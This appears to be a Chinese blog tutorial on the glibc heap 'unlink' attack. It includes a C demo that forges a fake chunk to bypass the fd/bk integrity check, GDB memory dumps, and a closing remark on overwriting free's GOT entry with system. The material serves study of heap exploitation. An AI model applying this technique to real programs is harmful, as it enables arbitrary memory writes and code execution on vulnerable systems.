unlink attack_二进制安全之堆溢出(系列)—— unlink

最新推荐文章于 2023-12-08 23:42:38 发布
最新推荐文章于 2023-12-08 23:42:38 发布
阅读量174 收藏
点赞数
文章标签: unlink attack visual studio内存溢出检测工具

3d75cf73-6917-eb11-8da9-e4434bdf6706.png

本文是二进制安全之堆溢出系列的第五章节,主要介绍unlink。

源程序

#include <stdio.h>
#include <malloc.h>
#include <unistd.h>
#include <string.h>
long long list[30]={0};
int main()
{
    char *p = malloc(0x80);
    char *q = malloc(0x80);
    char *r = malloc(0x80);
    sleep(0);
    printf("%pn",list);
    list[0] = p;
    sleep(0);
    printf("%pn",&p);
    *(long *) p = 0;
    *(long *) (p+8) = 0x81;
    *(long *) (p+16) = list - 0x3;
    *(long *) (p+24) = list - 0x2;
    *(long *) (q-16) = 0x80;
    *(long *) (q-8) = 0x90;
    sleep(0);
    free(q);
    sleep(0);
    strcpy(list[0],"111111111111111111111111x38x10x60"); 
  //由于list指向了list-0x18的位置,所以需要0x18个1来填充
    sleep(0);
    strcpy(list[0],"dddddddd");
  //相当于*list[0] = "dddddddd"
    malloc(0);
    sleep(0);
    return 0;
}

调试

  • 初始堆的情况
0x602000 PREV_INUSE {       ----> p
prev_size = 0, 
size = 145, 
fd = 0x0, 
bk = 0x0, 
fd_nextsize = 0x0, 
bk_nextsize = 0x0
}
0x602090 PREV_INUSE {  ---> q
prev_size = 0, 
size = 145, 
fd = 0x0, 
bk = 0x0, 
fd_nextsize = 0x0, 
bk_nextsize = 0x0
}
0x602120 PREV_INUSE {  --->r
prev_size = 0, 
size = 145, 
fd = 0x0, 
bk = 0x0, 
fd_nextsize = 0x0, 
bk_nextsize = 0x0
}
0x6021b0 PREV_INUSE {  --->top chunk
prev_size = 0, 
size = 134737, 
fd = 0x0, 
bk = 0x0, 
fd_nextsize = 0x0, 
bk_nextsize = 0x0
}
​

list[0] = p之后list的内存布局

0×601080 <list>:	0×0000000000602010	0×0000000000000000

打印p的地址

0x7fffffffdc20

p堆块改头换面

0x602000:   0x0000000000000000  0x0000000000000091
0x602010:   0x0000000000000000  0x0000000000000081      --->从这里开始改造
0x602020:   0x0000000000601068  0x0000000000601070      --->list - 0x18 list - 0x10
0x602030:   0x0000000000000000  0x0000000000000000

q堆块改头换面

原始的q堆块

0x602090:   0x0000000000000080  0x0000000000000091  --->Pre_inuse为1,表示p堆块正在使用中
0x6020a0:   0x0000000000000000  0x0000000000000000
改造后q堆块

0x602090:   0x0000000000000080  0x0000000000000090  -->更改p堆块的size以及inuse状态,便于合并及unlink
0x6020a0:   0x0000000000000000  0x0000000000000000

此时达到的效果,当free q的时候,就会前向合并,触发unlink

free q之后

0x602000 PREV_INUSE {
prev_size = 0, 
size = 145, 
fd = 0x0, 
bk = 0x111, 
fd_nextsize = 0x7ffff7dd1b78 <main_arena+88>, 
bk_nextsize = 0x7ffff7dd1b78 <main_arena+88>
}
0x602090 {
prev_size = 128, 
size = 144, 
fd = 0x0,                       ===>指向0
bk = 0x0, 
fd_nextsize = 0x0, 
bk_nextsize = 0x0
}
0x602120 {
prev_size = 272,            ===>从这里可以看出p,q合并了
size = 144, 
fd = 0x0, 
bk = 0x0, 
fd_nextsize = 0x0, 
bk_nextsize = 0x0
}

list[0]第一次赋值

0x601080 <list>:    0x0000000000601038  0x0000000000000000

此时0x601038的内容

0x601038:   0x00007ffff7a91130  0x00007ffff7ad9230
0x601048:   0x0000000000000000  0x0000000000000000
0x601058:   0x0000000000000000  0x0000000000000000
0x601068:   0x3131313131313131  0x3131313131313131
0x601078:   0x3131313131313131  0x0000000000601038
0x601088 <list+8>:  0x0000000000000000  0x0000000000000000

list[0]第二次赋值

0x601080 <list>:	0x0000000000601038	0x0000000000000000

此时0x601038的内容

0x601038:   0x6464646464646464  0x00007ffff7ad9200      ==>我们写入的dddddddd到了这里
0x601048:   0x0000000000000000  0x0000000000000000
0x601058:   0x0000000000000000  0x0000000000000000
0x601068:   0x3131313131313131  0x3232323232323232
0x601078:   0x3333333333333333  0x0000000000601038
0x601088 <list+8>:  0x0000000000000000  0x0000000000000000

原理

绕过检查的方式

p ->fd = list[0] - 0x18

p ->bk = list[0] - 0x10

list[0] = p

为什么这样就饶过检查了呢

检查的原理:

p->fd->bk = p && p->bk->fd = p

简单的加法:

p->fd->bk = p->fd+0x18 = list[0] = p

p->bk->fd = p->bk+0x18 = list[0] = p

unlink的操作实现了什么效果

断链的操作:p->fd->bk = p->bk && p->bk->fd = p->fd

方程组解析:

因为:

p->fd->bk = *(list[0] - 0x18 + 0x18) # 理解这一点至关重要,可以把p->fd理解为一个指针

p->fd->bk = p->bk

p->bk = list[0] - 0x10

所以:*(list[0]) = list[0] - 0x10

同理:*(list[0]) = list[0] - 0x18

效果:

list[0]指向了低三个指针长度的内存空间

现在编辑list[0],就相当于更改低三个指针长度的内存空间(L)的内容

假设现在list[0] = free_got,*L = system,当再次free一个堆块的时候,就会调用system。

4175cf73-6917-eb11-8da9-e4434bdf6706.png
weixin_39834281
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
printf打印二进制_优雅地打印 HEX 数据
weixin_40008033的博客
12-06 1616
优雅地打印 HEX 数据“代码片段。在调试的时候经常要打印内存里的数据,来看看数据及格式是否在预期范围内;以及在调试二进制协议的时候,经常需要将协议包里的数据打印出来,这个时候就会涉及到 HEX 数据的展示问题。这篇文章就是展示如何优雅地打印 HEX 数据。按照 BeyondCompare 形式打印 HEX 数据。”基础版代码如下:#define__is_print(ch)((uns...
printf如何按二进制格式打印
Turtle's trail
11-05 2万+
printf函数: int printf(const char *format, ...) format-- 这是字符串,包含了要被写入到标准输出 stdout 的文本。 它可以包含嵌入的 format 标签,format 标签可被随后的附加参数中指定的值替换,并按需求进行格式化。 format 标签属性是%[flags][width][.precision][length]specifier,...
zctf_2016_note3
Tw0的博客
03-16 126
heap中的unlink攻击是比较常用的技巧。后向的unlink利用条件更加简单,只需要off-by-null即可。但是前向的unlink因为需要设置伪造chunk的size,所以利用条件稍微困难一些,需要off-by-one才能实现。
Tcache Stashing Unlink Attack 原理详解
qq_41252520的博客
08-06 1534
calloc\textcolor{cornflowerblue}{calloc}calloc函数是直接调用_int_malloc\textcolor{cornflowerblue}{\_int\_malloc}_int_malloc函数分配内存的,并且会清空内存 所以calloc\textcolor{cornflowerblue}{calloc}calloc可以越过 tcache取空闲内存。而malloc\textcolor{cornflowerblue}{malloc}malloc函数先是判断是否启用了
PWN之堆利用-unlink攻击
susuate的博客
07-18 1648
环境配置 笔者使用ubuntu14.04.6_desktop_i386 国内镜像网站如下: http://mirrors.aliyun.com/ubuntu-releases/14.04/ glibc版本2.20 unlink攻击
printf用法之打印二进制,八进制,十进制,十六进制
热门推荐
agkl_hanhan的博客
04-05 3万+
printf用法之打印2进制,八进制,十进制,十六进制 printf是格式化输出函数,它可以直接打印十进制,八进制,十六进制,输出控制符分别为%d, %o, %x, 但是它不存在二进制,如果输出二进制,可以手写,但是也可以调用stdlib.h里面的itoa函数,他不是标准库里面的函数,但是大多数编译器里面都有这个函数,所以就介绍一下 itoa函数的原型为char* itoa(int value, char * string, int radix); int value 被转换的整数,char *string
堆漏洞之unlink1
08-04
"unlink1"漏洞利用的核心在于通过堆溢出覆盖相邻chunk的prev_inuse位,从而触发合并操作。当这个位被覆盖后,系统在执行free时可能会错误地认为两个chunk可以合并,进而执行`unlink`。此时,攻击者可以通过篡改相邻...
binary_vulnerability:二进制突破之栈溢出原理和利用技术,绕过安全保护技术(绕过NX,ASLR,PIE,Canary,RELRO等),格式化串行突破原理是利用技术,大量溢出漏洞原理和利用技术,glibc2 .30内存管理二进制文件深入分析,堆迭扩展(fastbin攻击,UAF,双重释放,堆重叠和扩展攻击,unlink攻击,house系列攻击)突破原理和攻破技巧
03-23
二进制漏洞挖掘技术摘要 该项目是关于挖掘二进制突破的一些技术和技巧,可以理解为它是一个教材,里面包含了一些常见突破的原理和攻击方式。 由于本人水平有限,不能避免可能会在文档中出现错误,敬请原谅。 注意: ...
Windows平台下的堆溢出利用技术
02-26
开头我讨论了在旧版本Windows下利用堆溢出的技术,试着给读者提供一些关于unlink过程是怎样执行的、以及freelist[n]里面的flink/blink是如何被攻击者控制并提供简单的任意“4字节写”操作的实用的知识。本文的主要...
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
printf二进制输出
最新发布
Yin_w的博客
12-08 4753
在C标准库中使用printf函数几乎可输出任意格式,但C语言标准库中并没有提供%b格式控制符用来输出二进制,我们可以使用递归自己写一个输出二进制的函数,输出的二进制形式为按位输出的字符格式:
堆(栈)溢出unlink
jiuweideqixu的博客
08-12 357
Daddy! how can I exploit unlink corruption? ssh unlink@pwnable.kr -p2222 (pw: guest) 源代码如下: #include <stdio.h> #include <stdlib.h> #include <string.h> typedef struct tagOBJ{ struct tagOBJ* fd; struct tagOBJ* bk; .
溢出-unlink
yms0211的博客
03-18 861
#有几张图出自hollk师傅的文章,原文链接:https://blog.csdn.net/qq_41202237/article/details/108481889# 堆溢出-unlinkunlink的利用大概就是对chunk进行内存布局,然后借助unlink中对指针的操作来修改chunk中的指针 unlink的宏定义: #define unlink(AV, P, BK, FD) { FD = P->f
sprintf,snprintf的用法(可以作为linux中itoa函数的补充)
记事本
05-05 1万+
函数功能:把格式化的数据写入某个字符串 头文件:stdio.h  函数原型:int sprintf( char *buffer, const char *format [, argument] … );  返回值:字符串长度(strlen) MSDN中的例子如下 #include void main( void ) { char buf
记录unlink的原理及例题分析
m0_73954357的博客
04-12 171
实现unlink攻击的条件 1 . 可以修改next_chunk的pre_size和size位 (为了绕过第一个检查,实现合并) 2 . 不能开pie (要知道需要合并的地址,所以不能开pie) 结合题目更好理解,下面给出例题(hitcontraining_bamboobox)
C语言中printf直接打出2进制数是%什么?16进制是什么?
weixin_30416871的博客
04-14 659
#include <iostream> #include <stdio.h> #include <stdlib.h> #include <string.h> using namespace std; char * get2String(long num) { int i = 0; char * buffer ...
溢出----Unlink
qq_42192672的博客
10-24 784
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink/                   http://www.anquan.us/static/drops/tips-16610.html 原理直接拷贝CTFWIKI的原话 这个直接看图挺容易懂得,有点像数据结构的链表操作 这个就是unlink的基本操...
溢出个人学习总结
snowleopard_bin的博客
08-01 5190
Unlink ctf wiki中有个地方困扰了我很久: // fd bk if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ malloc_printerr (check_action, "corrupted double-linked list", P, AV); ...
Unlink漏洞利用总结
WateranFire的博客
09-21 392
一般是连续的smallbin或者unsortbin堆块(双向链表)a,b,a可以溢出,有一个指针p指向a。在a上伪造一个堆块: pre_size size fd : p - 3*SIZE_SZ bk : p - 2*SIZE_SZ 其中SIZE_SZ=sizeof(size_t) 此外还需让b的SIZE最低位被溢出修改为0,即PREV_INUSE为0,并将PREV_SIZE设置为伪造堆块的大小。 之后执行free(b),由于检测到PREV_INUSE为0,对a执行un.
dentry_unlink_inode
05-23
`dentry_unlink_inode()` 是 Linux 内核中用于删除目录项(dentry)并解除其与 inode 之间关联的函数。在文件系统中,每个文件或目录都对应一个 inode,而目录项则是将文件名映射到相应的 inode 上的结构。当删除一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值